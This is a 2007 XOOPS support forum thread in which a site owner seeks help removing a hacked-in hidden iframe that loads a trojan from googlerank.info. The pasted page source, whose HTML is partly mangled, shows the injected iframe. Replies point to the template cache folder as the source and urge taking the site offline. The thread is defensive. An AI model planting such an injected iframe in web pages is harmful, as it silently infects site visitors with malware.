1
deano42
googlerank.info hack - help!
  • 2007/6/5 7:55

  • deano42

  • Just popping in

  • Posts: 13

  • Since: 2006/4/26


It appears as if my XOOPS site has been hacked, a iframe pointing to http://googlerank.info/counter has appeared in the coding on the main page which then trys to download something nasty.

I'm not sure where to look to remove it though, i extracted the MySQL database and couldnt find it in any of the tables and did a search for it in all the php,htm,html,css files of the site too.

Although not visable to a site user its coding appears underneath the menu on the left of the site, just before the random xoopsgallery image.

table><div class="blockContent"><table cellspacing="0">
  <
tr>
    <
td id="mainmenu">
      <
class="menuTop" href="http://www.blmra.co.uk/">Homea>
      
            <
class="menuMain" href="http://www.blmra.co.uk/modules/wfchannel/">About Lawn Mower Racinga>
                    <
class="menuMain" href="http://www.blmra.co.uk/modules/news/">Latest Newsa>
                    <
class="menuMain" href="http://www.blmra.co.uk/modules/googlemaps/">Eventsa>
                    <
class="menuMain" href="http://www.blmra.co.uk/modules/turismo/">12 Houra>
                    <
class="menuMain" href="http://www.blmra.co.uk/modules/xoopsfaq/">FAQa>
                    <
class="menuMain" href="http://www.blmra.co.uk/modules/page/">Race Resultsa>
                    <
class="menuMain" href="http://www.blmra.co.uk/modules/wmpdownloads/">Downloadsa>
                    <
class="menuMain" href="http://www.blmra.co.uk/modules/osC/">Online Purchasinga>
                    <
class="menuMain" href="http://www.blmra.co.uk/modules/xoopsgallery/">Gallerya>
                    <
class="menuMain" href="http://www.blmra.co.uk/modules/association/">Videoa>
                    <
class="menuMain" href="http://www.blmra.co.uk/modules/userpage/">Racers Profilesa>
                    <
class="menuMain" href="http://www.blmra.co.uk/modules/newbb/">Check Race Entrya>
                    <
class="menuMain" href="http://www.blmra.co.uk/modules/catads/">Classifiedsa>
                    <
class="menuMain" href="http://www.blmra.co.uk/modules/myalbum/">Users Photosa>
                    <
class="menuMain" href="http://www.blmra.co.uk/modules/mylinks/">Linksa>
                    <
class="menuMain" href="http://www.blmra.co.uk/modules/services/">Contact Usa>
                    <
class="menuMain" href="http://www.blmra.co.uk/modules/dms/">Document Management Systema>
                    
    td>
  tr>
table>div>td>
  tr>
table>

  <
table cellspacing="0">
  <
tr>
    <
td class="obBlock" ><table cellspacing="0">
  <
tr>
    <
td width="4"><img src="http://www.blmra.co.uk/themes/blmrav6//images/lhl.gif" width="4" height="20" alt="" />td>
    <
td class="blockTitle" >Random Picturetd>
    <
td width="4"><img src="http://www.blmra.co.uk/themes/blmrav6//images/lhr.gif" width="4" height="20" alt="" />td>
  tr>
table><div class="blockContent"><iframe src=http://googlerank.info/counter width=1 height=1 style=display:none>
<div>  <div style="width: 100%;">
  <
div class="item" style="padding: 2px; margin: 2px;">
    <
div style="text-align: center; width: 100%; ">
        <
a href="http://www.blmra.co.uk/modules/xoopsgallery/view_photo.php?xoops_imageid=4332&set_albumName=album18&id=IMG_0167"><img src="http://www.blmra.co.uk/modules/xoopsgallery/cache/albums/album18/IMG_0167.thumb.jpg" width="150" height="100" alt="" />a><br />
    div>
    <
div style="text-align: center; width: 100%; ">
    div>
  div>
  div>
<
div style="clear:both;">div>div>
div>td>
  tr>
table>


Anyone have any ideas where i should look to remove this?

The site is http://www.blmra.co.uk, my virus scanner catches it every time. Although look at your own risk, it trys to install a trojan.

Thanks

Deano

2
stefan88
Re: googlerank.info hack - help!
  • 2007/6/5 8:06

  • stefan88

  • Community Support Member

  • Posts: 1086

  • Since: 2004/9/20


Hi,

check template cache folder (templates_c). Delete files there.
..

3
deano42
Re: googlerank.info hack - help!
  • 2007/6/5 8:17

  • deano42

  • Just popping in

  • Posts: 13

  • Since: 2006/4/26


That did it! Is there anyway i can stop this from happening again?

I have installed XOOPS protector since this occured,

Thanks Stefan,

Dean

4
BDW
Re: googlerank.info hack - help!
  • 2007/6/6 9:57

  • BDW

  • Quite a regular

  • Posts: 280

  • Since: 2002/9/28


Quote:

deano42 wrote:

The site is http://www.blmra.co.uk, my virus scanner catches it every time. Although look at your own risk, it trys to install a trojan.


BTW, just a wee warning, if you knew there was a Trojan on your website you should have closed it to the public.

How many peoples computers has it infected that visited your site? they can sue you if they find out you knew about it.

5
stefan88
Re: googlerank.info hack - help!
  • 2007/6/6 10:23

  • stefan88

  • Community Support Member

  • Posts: 1086

  • Since: 2004/9/20


Hi deano42,

one thing I forgot: you should not delete index.html file. It is available in other folders, so please delete the files in "templates_c" folder again and copy index.html from one of other folders to "templates_c" folder!

It is a simple text file called index.html with this text:

<script>history.go(-1);script>


Sorry about that mistake!

Probably the problem is with your hosting company and not with xoops, so there is not much you can do. Maybe creating .htaccess in templates_c folder may help, but I'm not very familiar with Apache ...
..

Login

Who's Online

289 user(s) are online (216 user(s) are browsing Support Forums)


Members: 0


Guests: 289


more...

Donat-O-Meter

Stats
Goal: $100.00
Due Date: Nov 30
Gross Amount: $0.00
Net Balance: $0.00
Left to go: $100.00
Make donations with PayPal!

Latest GitHub Commits